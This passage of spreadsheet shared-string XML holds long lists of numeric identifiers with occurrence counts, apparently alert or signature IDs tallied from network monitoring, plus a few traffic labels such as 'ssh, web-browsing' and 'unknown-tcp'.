    <t>44489 (1), 12 (1)</t>
  </si>
  <si>
    <t>44489, 12</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059104 (1), 2059102 (1), 2059112 (1), 2059106 (1), 2059114 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059104, 2059102, 2059112, 2059106, 2059114</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 44489 (1), 12 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059104 (1), 2059102 (1), 2059112 (1), 2059106 (1), 2059114 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 44489, 12, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059104, 2059102, 2059112, 2059106, 2059114</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 12 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 12</t>
  </si>
  <si>
    <t>2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059104 (1), 2059102 (1), 2059112 (1), 2059106 (1), 2059114 (1)</t>
  </si>
  <si>
    <t>2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059104, 2059102, 2059112, 2059106, 2059114</t>
  </si>
  <si>
    <t>50447 (6), 5708 (1)</t>
  </si>
  <si>
    <t>50447, 5708</t>
  </si>
  <si>
    <t>2006409 (6), 2060251 (5), 2043217 (5), 2002752 (2), 2002749 (2), 2060252 (1), 2034567 (1), 2013028 (1), 2016992 (1), 2002824 (1)</t>
  </si>
  <si>
    <t>2006409, 2060251, 2043217, 2002752, 2002749, 2060252, 2034567, 2013028, 2016992, 2002824</t>
  </si>
  <si>
    <t>50447 (6), 2006409 (6), 2060251 (5), 2043217 (5), 2002752 (2), 2002749 (2), 5708 (1), 2060252 (1), 2034567 (1), 2013028 (1), 2016992 (1), 2002824 (1)</t>
  </si>
  <si>
    <t>50447, 2006409, 2060251, 2043217, 2002752, 2002749, 5708, 2060252, 2034567, 2013028, 2016992, 2002824</t>
  </si>
  <si>
    <t>2043217 (5)</t>
  </si>
  <si>
    <t>2043217</t>
  </si>
  <si>
    <t>50447 (6)</t>
  </si>
  <si>
    <t>2006409 (6), 2043217 (5)</t>
  </si>
  <si>
    <t>2006409, 2043217</t>
  </si>
  <si>
    <t>50447 (6), 2006409 (6), 2043217 (5)</t>
  </si>
  <si>
    <t>50447, 2006409, 2043217</t>
  </si>
  <si>
    <t>2034567 (1), 2013028 (1), 2016992 (1)</t>
  </si>
  <si>
    <t>2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2034567 (1), 2013028 (1), 2016992 (1), 2002824 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2034567, 2013028, 2016992, 2002824</t>
  </si>
  <si>
    <t>5708 (1)</t>
  </si>
  <si>
    <t>5708</t>
  </si>
  <si>
    <t>2060251 (5), 2060252 (1)</t>
  </si>
  <si>
    <t>2060251, 2060252</t>
  </si>
  <si>
    <t>2060251 (5), 5708 (1), 2060252 (1)</t>
  </si>
  <si>
    <t>2060251, 5708, 2060252</t>
  </si>
  <si>
    <t>15893</t>
  </si>
  <si>
    <t>18123</t>
  </si>
  <si>
    <t>ssh, web-browsing</t>
  </si>
  <si>
    <t>12 (6), 44728 (2)</t>
  </si>
  <si>
    <t>12, 44728</t>
  </si>
  <si>
    <t>2002749 (14), 2035480 (2), 2000419 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2002749, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>2025644 (2)</t>
  </si>
  <si>
    <t>2025644</t>
  </si>
  <si>
    <t>44728 (2)</t>
  </si>
  <si>
    <t>44728</t>
  </si>
  <si>
    <t>2000419 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2000419, 2025644</t>
  </si>
  <si>
    <t>44728 (2), 2000419 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>44728, 2000419, 2025644</t>
  </si>
  <si>
    <t>2002749 (14)</t>
  </si>
  <si>
    <t>2002749 (14), 12 (6)</t>
  </si>
  <si>
    <t>2002749, 12</t>
  </si>
  <si>
    <t>2035480 (2)</t>
  </si>
  <si>
    <t>2035480</t>
  </si>
  <si>
    <t>12449</t>
  </si>
  <si>
    <t>33515</t>
  </si>
  <si>
    <t>unknown-tcp</t>
  </si>
  <si>
    <t>12 (166), 60401 (70), 33 (13), 14 (5), 25975 (5), 16431 (3), 31 (2), 24342 (2), 19 (1), 25977 (1), 21516 (1), 18 (1)</t>
  </si>
  <si>
    <t>12, 60401, 33, 14, 25975, 16431, 31, 24342, 19, 25977, 21516, 18</t>
  </si>
  <si>
    <t>2009714 (265), 2049400 (150), 2010920 (41), 2016141 (39), 2101402 (28), 2009362 (24), 2009361 (23), 2027250 (17), 2017442 (17), 2021390 (14), 2101245 (13), 2027265 (12), 2019526 (11), 2100987 (8), 2100977 (8), 2100981 (8), 2101244 (6), 2017440 (6), 2006446 (5), 2010963 (5), 2016184 (5), 2101018 (5), 2101129 (4), 2030337 (4), 2101201 (4), 2101242 (3), 2027263 (3), 2027253 (3), 2100993 (3), 2101401 (3), 2011042 (3), 2101013 (3), 2002901 (3), 2101071 (2), 2027262 (2), 2018752 (2), 2101145 (2), 2010766 (2), 2101016 (2), 2101877 (2), 2009485 (2), 2100982 (2), 2101403 (2), 2011564 (2), 2002879 (2), 2008897 (2), 2017441 (2), 2002677 (1), 2101256 (1), 2019714 (1), 2049401 (1), 2101108 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 2101487 (1), 2102073 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959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 2017436 (1)</t>
  </si>
  <si>
    <t>2009714, 2049400, 2010920, 2016141, 2101402, 2009362, 2009361, 2027250, 2017442, 2021390, 2101245, 2027265, 2019526, 2100987, 2100977, 2100981, 2101244, 2017440, 2006446, 2010963, 2016184, 2101018, 2101129, 2030337, 2101201, 2101242, 2027263, 2027253, 2100993, 2101401, 2011042, 2101013, 2002901, 2101071, 2027262, 2018752, 2101145, 2010766, 2101016, 2101877, 2009485, 2100982, 2101403, 2011564, 2002879, 2008897, 2017441, 2002677, 2101256, 2019714, 2049401, 2101108, 2100952, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2101487, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959,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 2017436</t>
  </si>
  <si>
    <t>50447 (6280), 17429 (6005), 2002 (665), 41742 (493), 7070 (265), 41188 (221), 12 (166), 1122 (150), 1250 (94), 1560 (71), 60401 (70), 59258 (57), 39348 (45), 2565 (39), 1402 (28), 1301 (26), 1142 (26), 966 (26), 1288 (24), 1002 (23), 882 (23), 31377 (18), 20258 (16), 2152 (14), 38371 (14), 33294 (14), 12610 (14), 1245 (13), 41187 (13), 1147 (13), 42465 (13), 33 (13), 31360 (13), 20654 (13), 42289 (11), 1400 (10), 1774 (10), 977 (9), 1998 (9), 987 (8), 31940 (8), 1385 (8), 1043 (8), 1044 (7), 56563 (7), 918 (6), 1125 (6), 1286 (6), 1244 (6), 2077 (6), 43356 (6), 1213 (6), 1875 (5), 14 (5), 2228 (5), 928 (5), 25975 (5), 1564 (5), 1500 (5), 1018 (5), 1637 (5), 55647 (5), 1129 (4), 20173 (4), 1880 (4), 962 (4), 1826 (4), 974 (4), 1827 (4), 20674 (4), 930 (4), 1141 (4), 937 (4), 1201 (4), 1997 (4), 879 (4), 950 (4), 1542 (4), 944 (4), 943 (4), 1005 (4), 40353 (4), 908 (4), 31362 (4), 2410 (4), 1242 (3), 1738 (3), 993 (3), 1848 (3), 1401 (3), 911 (3), 1376 (3), 16431 (3), 49920 (3), 1013 (3), 1019 (3), 979 (3), 1556 (3), 31013 (3), 20731 (3), 1254 (3), 1071 (2), 1131 (2), 1130 (2), 971 (2), 1029 (2), 1145 (2), 31 (2), 2056 (2), 1172 (2), 24342 (2), 1016 (2), 2076 (2), 1493 (2), 1148 (2), 1166 (2), 1765 (2), 903 (2), 1773 (2), 1828 (2), 1231 (2), 7071 (2), 1667 (2), 43458 (2), 1877 (2), 1212 (2), 940 (2), 1248 (2), 1175 (2), 932 (2), 1214 (2), 946 (2), 851 (2), 50921 (2), 2144 (2), 43289 (2), 1037 (2), 1156 (2), 17387 (2), 1119 (2), 1120 (2), 1816 (2), 1165 (2), 1614 (2), 1871 (2), 954 (2), 1031 (2), 2198 (2), 1557 (2), 1555 (2), 1873 (2), 1522 (2), 1523 (2), 895 (2), 21515 (2), 2393 (2), 50923 (2), 27218 (2), 2295 (2), 27192 (2), 16613 (2), 22097 (2), 43238 (1), 1668 (1), 1852 (1), 40880 (1), 18742 (1), 913 (1), 914 (1), 912 (1), 985 (1), 853 (1), 8492 (1), 43808 (1), 999 (1), 1486 (1), 857 (1), 1284 (1), 3201 (1), 986 (1), 1256 (1), 509 (1), 1482 (1), 1567 (1), 1568 (1), 1772 (1), 1080 (1), 1128 (1), 1076 (1), 1492 (1), 53017 (1), 1146 (1), 1660 (1), 1528 (1), 1164 (1), 2484 (1), 1551 (1), 1150 (1), 1576 (1), 1152 (1), 1580 (1), 1153 (1), 1154 (1), 2062 (1), 1048 (1), 1103 (1), 1586 (1), 1577 (1), 1578 (1), 1579 (1), 931 (1), 2246 (1), 1587 (1), 992 (1), 875 (1), 1829 (1), 906 (1), 8493 (1), 3674 (1), 1517 (1), 2154 (1), 2358 (1), 1224 (1), 1491 (1), 1490 (1), 1611 (1), 1088 (1), 2000 (1), 1157 (1), 15990 (1), 1767 (1), 1834 (1), 61117 (1), 36037 (1), 2347 (1), 2346 (1), 1835 (1), 922 (1), 1659 (1), 910 (1), 1722 (1), 1108 (1), 8490 (1), 915 (1), 935 (1), 59237 (1), 1163 (1), 2060 (1), 1173 (1), 1544 (1), 936 (1), 1230 (1), 1742 (1), 1743 (1), 1540 (1), 2138 (1), 1168 (1), 1407 (1), 805 (1), 1726 (1), 939 (1), 952 (1), 967 (1), 955 (1), 958 (1), 961 (1), 965 (1), 1847 (1), 1111 (1), 1592 (1), 43290 (1), 1481 (1), 1521 (1), 1123 (1), 1183 (1), 1160 (1), 807 (1), 1193 (1), 978 (1), 21161 (1), 1023 (1), 1024 (1), 1487 (1), 2325 (1), 1162 (1), 1134 (1), 904 (1), 907 (1), 905 (1), 1215 (1), 1192 (1), 1155 (1), 1161 (1), 1202 (1), 1030 (1), 1040 (1), 60573 (1), 887 (1), 878 (1), 1038 (1), 1022 (1), 1077 (1), 1078 (1), 1075 (1), 984 (1), 1073 (1), 1127 (1), 844 (1), 1585 (1), 1584 (1), 1582 (1), 1151 (1), 1575 (1), 1583 (1), 1581 (1), 41189 (1), 2148 (1), 2151 (1), 1458 (1), 2137 (1), 2397 (1), 1525 (1), 2215 (1), 2223 (1), 1787 (1), 1724 (1), 1723 (1), 2204 (1), 2205 (1), 2206 (1), 2073 (1), 2225 (1), 2130 (1), 2131 (1), 2214 (1), 2086 (1), 2085 (1), 2219 (1), 2133 (1), 1434 (1), 1433 (1), 1872 (1), 1874 (1), 839 (1), 941 (1), 945 (1), 980 (1), 942 (1), 947 (1), 968 (1), 956 (1), 949 (1), 957 (1), 990 (1), 953 (1), 951 (1), 959 (1), 964 (1), 2447 (1), 1070 (1), 1559 (1), 2395 (1), 2326 (1), 2196 (1), 948 (1), 1851 (1), 1110 (1), 1489 (1), 1571 (1), 818 (1), 1032 (1), 1033 (1), 1034 (1), 1035 (1), 1036 (1), 2142 (1), 2141 (1), 1527 (1), 1526 (1), 902 (1), 1520 (1), 1209 (1), 1770 (1), 1769 (1), 33613 (1), 33612 (1), 1004 (1), 17410 (1), 19 (1), 50924 (1), 50925 (1), 50922 (1), 41817 (1), 2276 (1), 25977 (1), 21516 (1), 20663 (1), 64480 (1), 28912 (1), 31637 (1), 20631 (1), 20632 (1), 2143 (1), 20633 (1), 27230 (1), 28957 (1), 20815 (1), 27688 (1), 43724 (1), 43691 (1), 20656 (1), 1671 (1), 20728 (1), 2363 (1), 1399 (1), 31638 (1), 59332 (1), 1091 (1), 20651 (1), 20826 (1), 44133 (1), 2285 (1), 2140 (1), 31419 (1), 886 (1), 2281 (1), 43392 (1), 18478 (1), 27284 (1), 20732 (1), 2288 (1), 2298 (1), 31568 (1), 24502 (1), 23362 (1), 18 (1), 22064 (1), 43285 (1)</t>
  </si>
  <si>
    <t>50447, 17429, 2002, 41742, 7070, 41188, 12, 1122, 1250, 1560, 60401, 59258, 39348, 2565, 1402, 1301, 1142, 966, 1288, 1002, 882, 31377, 20258, 2152, 38371, 33294, 12610, 1245, 41187, 1147, 42465, 33, 31360, 20654, 42289, 1400, 1774, 977, 1998, 987, 31940, 1385, 1043, 1044, 56563, 918, 1125, 1286, 1244, 2077, 43356, 1213, 1875, 14, 2228, 928, 25975, 1564, 1500, 1018, 1637, 55647, 1129, 20173, 1880, 962, 1826, 974, 1827, 20674, 930, 1141, 937, 1201, 1997, 879, 950, 1542, 944, 943, 1005, 40353, 908, 31362, 2410, 1242, 1738, 993, 1848, 1401, 911, 1376, 16431, 49920, 1013, 1019, 979, 1556, 31013, 20731, 1254, 1071, 1131, 1130, 971, 1029, 1145, 31, 2056, 1172, 24342, 1016, 2076, 1493, 1148, 1166, 1765, 903, 1773, 1828, 1231, 7071, 1667, 43458, 1877, 1212, 940, 1248, 1175, 932, 1214, 946, 851, 50921, 2144, 43289, 1037, 1156, 17387, 1119, 1120, 1816, 1165, 1614, 1871, 954, 1031, 2198, 1557, 1555, 1873, 1522, 1523, 895, 21515, 2393, 50923, 27218, 2295, 27192, 16613, 22097, 43238, 1668, 1852, 40880, 18742, 913, 914, 912, 985, 853, 8492, 43808, 999, 1486, 857, 1284, 3201, 986, 1256, 509, 1482, 1567, 1568, 1772, 1080, 1128, 1076, 1492, 53017, 1146, 1660, 1528, 1164, 2484, 1551, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1048, 1103, 1586, 1577, 1578, 1579, 931, 2246, 1587, 992, 875, 1829, 906, 8493, 3674, 1517, 2154, 2358, 1224, 1491, 1490, 1611, 1088, 2000, 1157, 15990, 1767, 1834, 61117, 36037, 2347, 2346, 1835, 922, 1659, 910, 1722, 1108, 8490, 915, 935, 59237, 1163, 2060, 1173, 1544, 936, 1230, 1742, 1743, 1540, 2138, 1168, 1407, 805, 1726, 939, 952, 967, 955, 958, 961, 965, 1847, 1111, 1592, 43290, 1481, 1521, 1123, 1183, 1160, 807, 1193, 978, 21161, 1023, 1024, 1487, 2325, 1162, 1134, 904, 907, 905, 1215, 1192, 1155, 1161, 1202, 1030, 1040, 60573, 887, 878, 1038, 1022, 1077, 1078, 1075, 984, 1073, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 41189, 2148, 2151, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 1723, 2204, 2205, 2206, 2073, 2225, 2130, 2131, 2214, 2086, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1070, 1559, 2395, 2326, 2196, 948, 1851, 1110, 1489, 1571, 818, 1032, 1033, 1034, 1035, 1036, 2142, 2141, 1527, 1526, 902, 1520, 1209, 1770, 1769, 33613, 33612, 1004, 17410, 19, 50924, 50925, 50922, 41817, 2276, 25977, 21516, 20663, 64480, 28912, 31637, 20631, 20632, 2143, 20633, 27230, 28957, 20815, 27688, 43724, 43691, 20656, 1671, 20728, 2363, 1399, 31638, 59332, 1091, 20651, 20826, 44133, 2285, 2140, 31419, 886, 2281, 43392, 18478, 27284, 20732, 2288, 2298, 31568, 24502, 23362, 18, 22064, 43285</t>
  </si>
  <si>
    <t>2009151 (2267), 2009714 (265), 2009885 (203), 2049400 (150), 2101122 (150), 2002681 (102), 2003595 (92), 2003099 (75), 2002731 (59), 2010920 (41), 2016141 (39), 2101402 (28), 2101288 (24), 2009362 (24), 2009361 (23), 2001218 (19), 2027250 (17), 2017442 (17), 2101945 (14), 2002070 (14), 2021390 (14), 2101245 (13), 2002996 (13), 2027265 (12), 2019526 (11), 2100987 (8), 2012911 (8), 2100977 (8), 2100981 (8), 2003670 (7), 2101244 (6), 2017440 (6), 2100988 (5), 2010963 (5), 2016184 (5), 2101018 (5), 2101129 (4), 2030337 (4), 2009001 (4), 2100937 (4), 2101201 (4), 2009180 (4), 2003715 (4), 2101242 (3), 2027263 (3), 2027253 (3), 2101738 (3), 2100993 (3), 2101401 (3), 2006609 (3), 2011040 (3), 2004589 (3), 2101013 (3), 2009884 (3), 2003739 (3), 2003333 (3), 2002901 (3), 2002752 (2), 2002749 (2), 2101071 (2), 2027262 (2), 2018752 (2), 2100971 (2), 2101145 (2), 2010767 (2), 2010766 (2), 2102056 (2), 2101016 (2), 2012913 (2), 2101877 (2), 2009485 (2), 2101156 (2), 2100982 (2), 2101403 (2), 2101332 (2), 2011564 (2), 2009167 (2), 2003740 (2), 2009382 (2), 2002879 (2), 2008897 (2), 2003738 (2), 2003699 (2), 2003677 (2), 2002815 (2), 2010027 (2), 2003731 (2), 2002800 (2), 2100884 (2), 2008922 (2), 2017441 (2), 2003698 (2), 2003717 (2), 2003706 (2), 2003707 (2), 2003708 (2), 2003709 (2), 2003711 (2), 2003713 (2), 2003712 (2), 2003710 (2), 2003714 (2), 2003867 (2), 2003693 (2), 2008996 (2), 2009179 (2), 2002677 (1), 2101852 (1), 2001343 (1), 2101256 (1), 2019714 (1), 2014379 (1), 2011031 (1), 2049401 (1), 2001949 (1), 2004592 (1), 2101108 (1), 2020296 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2101847 (1), 2101111 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 2101193 (1), 2101023 (1), 2101487 (1), 2102073 (1), 2102131 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959 (1), 2101110 (1), 2101489 (1), 2002133 (1), 2016182 (1), 2011696 (1), 2010377 (1), 2009435 (1), 2010095 (1), 2009317 (1), 2009318 (1), 2009397 (1), 2009931 (1), 2009848 (1), 2009321 (1), 2010475 (1), 2009311 (1), 2009313 (1), 2012795 (1), 2009367 (1), 2009757 (1), 2009758 (1), 2009759 (1), 2009755 (1), 2009756 (1), 2009760 (1), 2009754 (1), 2009466 (1), 2009467 (1), 2009468 (1), 2009384 (1), 2009059 (1), 2009060 (1), 2009061 (1), 2009062 (1), 2009877 (1), 2009391 (1), 2009369 (1), 2012369 (1), 2010485 (1), 2009871 (1), 2009872 (1), 2009873 (1), 2009196 (1), 2010099 (1), 2009459 (1), 2009898 (1), 2009166 (1), 2003682 (1), 2003704 (1), 2010260 (1), 2009933 (1), 2012013 (1), 2008826 (1), 2009307 (1), 2009051 (1), 2010354 (1), 2009788 (1), 2003678 (1), 2003679 (1), 2009225 (1), 2010252 (1), 2008833 (1), 2010355 (1), 2009793 (1), 2009163 (1), 2003688 (1), 2003696 (1), 2009892 (1), 2009398 (1), 2003703 (1), 2003729 (1), 2003728 (1), 2003727 (1), 2003726 (1), 2009316 (1), 2009101 (1), 2010197 (1), 2008904 (1), 2008903 (1), 2010276 (1), 2008900 (1), 2008901 (1), 2008902 (1), 2010126 (1), 2003671 (1), 2010466 (1), 2009427 (1), 2002902 (1), 2008871 (1), 2003680 (1), 2003701 (1), 2008879 (1), 2010362 (1), 2009381 (1), 2009386 (1), 2010473 (1), 2009188 (1), 2009903 (1), 2008899 (1), 2003737 (1), 2003517 (1), 2009932 (1), 2011274 (1), 2003732 (1), 2003733 (1), 2003718 (1), 2003700 (1), 2003689 (1), 2009364 (1), 2010124 (1), 2010564 (1), 2010125 (1), 2003331 (1), 2011384 (1), 2011259 (1), 2003672 (1), 2003673 (1), 2003674 (1), 2003675 (1), 2003676 (1), 2009415 (1), 2003660 (1), 2003661 (1), 2003664 (1), 2010484 (1), 2003662 (1), 2009372 (1), 2003663 (1), 2003665 (1), 2003666 (1), 2003667 (1), 2003668 (1), 2003681 (1), 2003694 (1), 2002898 (1), 2009887 (1), 2003705 (1), 2009370 (1), 2009371 (1), 2008964 (1), 2009504 (1), 2009502 (1), 2009723 (1), 2003702 (1), 2009325 (1), 2009326 (1), 2008962 (1), 2009164 (1), 2003720 (1), 2003719 (1), 2003721 (1), 2009123 (1), 2009506 (1), 2009229 (1), 2003741 (1), 2003743 (1), 2003744 (1), 2003745 (1), 2009071 (1), 2019524 (1), 2009333 (1), 2009733 (1), 2003669 (1), 2009656 (1), 2009653 (1), 2009378 (1), 2009717 (1), 2009379 (1), 2014180 (1), 2010254 (1), 2003716 (1), 2017436 (1), 2003692 (1), 2003747 (1), 2003686 (1), 2009190 (1), 2011160 (1), 2056027 (1)</t>
  </si>
  <si>
    <t>2009151, 2009714, 2009885, 2049400, 2101122, 2002681, 2003595, 2003099, 2002731, 2010920, 2016141, 2101402, 2101288, 2009362, 2009361, 2001218, 2027250, 2017442, 2101945, 2002070, 2021390, 2101245, 2002996, 2027265, 2019526, 2100987, 2012911, 2100977, 2100981, 2003670, 2101244, 2017440, 2100988, 2010963, 2016184, 2101018, 2101129, 2030337, 2009001, 2100937, 2101201, 2009180, 2003715, 2101242, 2027263, 2027253, 2101738, 2100993, 2101401, 2006609, 2011040, 2004589, 2101013, 2009884, 2003739, 2003333, 2002901, 2002752, 2002749, 2101071, 2027262, 2018752, 2100971, 2101145, 2010767, 2010766, 2102056, 2101016, 2012913, 2101877, 2009485, 2101156, 2100982, 2101403, 2101332, 2011564, 2009167, 2003740, 2009382, 2002879, 2008897, 2003738, 2003699, 2003677, 2002815, 2010027, 2003731, 2002800, 2100884, 2008922, 2017441, 2003698, 2003717, 2003706, 2003707, 2003708, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2008996, 2009179, 2002677, 2101852, 2001343, 2101256, 2019714, 2014379, 2011031, 2049401, 2001949, 2004592, 2101108, 2020296, 2100952, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2101193, 2101023, 2101487, 2102073, 2102131, 2049402, 2101874, 2100953, 2100951, 2100959, 2101110, 2101489, 2002133, 2016182, 2011696, 2010377, 2009435, 2010095, 2009317, 2009318, 2009397, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2010485, 2009871, 2009872, 2009873, 2009196, 2010099, 2009459, 2009898, 2009166, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2009788, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2009163, 2003688, 2003696, 2009892, 2009398, 2003703, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2009427, 2002902, 2008871, 2003680, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2003737, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2019524, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2017436, 2003692, 2003747, 2003686, 2009190, 2011160, 2056027</t>
  </si>
  <si>
    <t>50447 (6280), 17429 (6005), 2009151 (2267), 2002 (665), 41742 (493), 7070 (265), 2009714 (265), 41188 (221), 2009885 (203), 12 (166), 1122 (150), 2049400 (150), 2101122 (150), 2002681 (102), 1250 (94), 2003595 (92), 2003099 (75), 1560 (71), 60401 (70), 2002731 (59), 59258 (57), 39348 (45), 2010920 (41), 2565 (39), 2016141 (39), 1402 (28), 2101402 (28), 1301 (26), 1142 (26), 966 (26), 1288 (24), 2101288 (24), 2009362 (24), 1002 (23), 882 (23), 2009361 (23), 2001218 (19), 31377 (18), 2027250 (17), 2017442 (17), 20258 (16), 2152 (14), 38371 (14), 33294 (14), 12610 (14), 2101945 (14), 2002070 (14), 2021390 (14), 1245 (13), 41187 (13), 1147 (13), 42465 (13), 33 (13), 31360 (13), 20654 (13), 2101245 (13), 2002996 (13), 2027265 (12), 42289 (11), 2019526 (11), 1400 (10), 1774 (10), 977 (9), 1998 (9), 987 (8), 31940 (8), 1385 (8), 1043 (8), 2100987 (8), 2012911 (8), 2100977 (8), 2100981 (8), 1044 (7), 56563 (7), 2003670 (7), 918 (6), 1125 (6), 1286 (6), 1244 (6), 2077 (6), 43356 (6), 1213 (6), 2101244 (6), 2017440 (6), 1875 (5), 14 (5), 2228 (5), 928 (5), 25975 (5), 1564 (5), 1500 (5), 1018 (5), 1637 (5), 55647 (5), 2100988 (5), 2010963 (5), 2016184 (5), 2101018 (5), 1129 (4), 20173 (4), 1880 (4), 962 (4), 1826 (4), 974 (4), 1827 (4), 20674 (4), 930 (4), 1141 (4), 937 (4), 1201 (4), 1997 (4), 879 (4), 950 (4), 1542 (4), 944 (4), 943 (4), 1005 (4), 40353 (4), 908 (4), 31362 (4), 2410 (4), 2101129 (4), 2030337 (4), 2009001 (4), 2100937 (4), 2101201 (4), 2009180 (4), 2003715 (4), 1242 (3), 1738 (3), 993 (3), 1848 (3), 1401 (3), 911 (3), 1376 (3), 16431 (3), 49920 (3), 1013 (3), 1019 (3), 979 (3), 1556 (3), 31013 (3), 20731 (3), 1254 (3), 2101242 (3), 2027263 (3), 2027253 (3), 2101738 (3), 2100993 (3), 2101401 (3), 2006609 (3), 2011040 (3), 2004589 (3), 2101013 (3), 2009884 (3), 2003739 (3), 2003333 (3), 2002901 (3), 1071 (2), 1131 (2), 1130 (2), 971 (2), 1029 (2), 1145 (2), 31 (2), 2056 (2), 1172 (2), 24342 (2), 1016 (2), 2076 (2), 1493 (2), 1148 (2), 1166 (2), 1765 (2), 903 (2), 1773 (2), 1828 (2), 1231 (2), 7071 (2), 1667 (2), 43458 (2), 1877 (2), 1212 (2), 940 (2), 1248 (2), 1175 (2), 932 (2), 1214 (2), 946 (2), 851 (2), 50921 (2), 2144 (2), 43289 (2), 1037 (2), 1156 (2), 17387 (2), 1119 (2), 1120 (2), 1816 (2), 1165 (2), 1614 (2), 1871 (2), 954 (2), 1031 (2), 2198 (2), 1557 (2), 1555 (2), 1873 (2), 1522 (2), 1523 (2), 895 (2), 21515 (2), 2393 (2), 50923 (2), 27218 (2), 2295 (2), 27192 (2), 16613 (2), 22097 (2), 2002752 (2), 2002749 (2), 2101071 (2), 2027262 (2), 2018752 (2), 2100971 (2), 2101145 (2), 2010767 (2), 2010766 (2), 2102056 (2), 2101016 (2), 2012913 (2), 2101877 (2), 2009485 (2), 2101156 (2), 2100982 (2), 2101403 (2), 2101332 (2), 2011564 (2), 2009167 (2), 2003740 (2), 2009382 (2), 2002879 (2), 2008897 (2), 2003738 (2), 2003699 (2), 2003677 (2), 2002815 (2), 2010027 (2), 2003731 (2), 2002800 (2), 2100884 (2), 2008922 (2), 2017441 (2), 2003698 (2), 2003717 (2), 2003706 (2), 2003707 (2), 2003708 (2), 2003709 (2), 2003711 (2), 2003713 (2), 2003712 (2), 2003710 (2), 2003714 (2), 2003867 (2), 2003693 (2), 2008996 (2), 2009179 (2), 43238 (1), 1668 (1), 1852 (1), 40880 (1), 18742 (1), 913 (1), 914 (1), 912 (1), 985 (1), 853 (1), 8492 (1), 43808 (1), 999 (1), 1486 (1), 857 (1), 1284 (1), 3201 (1), 986 (1), 1256 (1), 509 (1), 1482 (1), 1567 (1), 1568 (1), 1772 (1), 1080 (1), 1128 (1), 1076 (1), 1492 (1), 53017 (1), 1146 (1), 1660 (1), 1528 (1), 1164 (1), 2484 (1), 1551 (1), 1150 (1), 1576 (1), 1152 (1), 1580 (1), 1153 (1), 1154 (1), 2062 (1), 1048 (1), 1103 (1), 1586 (1), 1577 (1), 1578 (1), 1579 (1), 931 (1), 2246 (1), 1587 (1), 992 (1), 875 (1), 1829 (1), 906 (1), 8493 (1), 3674 (1), 1517 (1), 2154 (1), 2358 (1), 1224 (1), 1491 (1), 1490 (1), 1611 (1), 1088 (1), 2000 (1), 1157 (1), 15990 (1), 1767 (1), 1834 (1), 61117 (1), 36037 (1), 2347 (1), 2346 (1), 1835 (1), 922 (1), 1659 (1), 910 (1), 1722 (1), 1108 (1), 8490 (1), 915 (1), 935 (1), 59237 (1), 1163 (1), 2060 (1), 1173 (1), 1544 (1), 936 (1), 1230 (1), 1742 (1), 1743 (1), 1540 (1), 2138 (1), 1168 (1), 1407 (1), 805 (1), 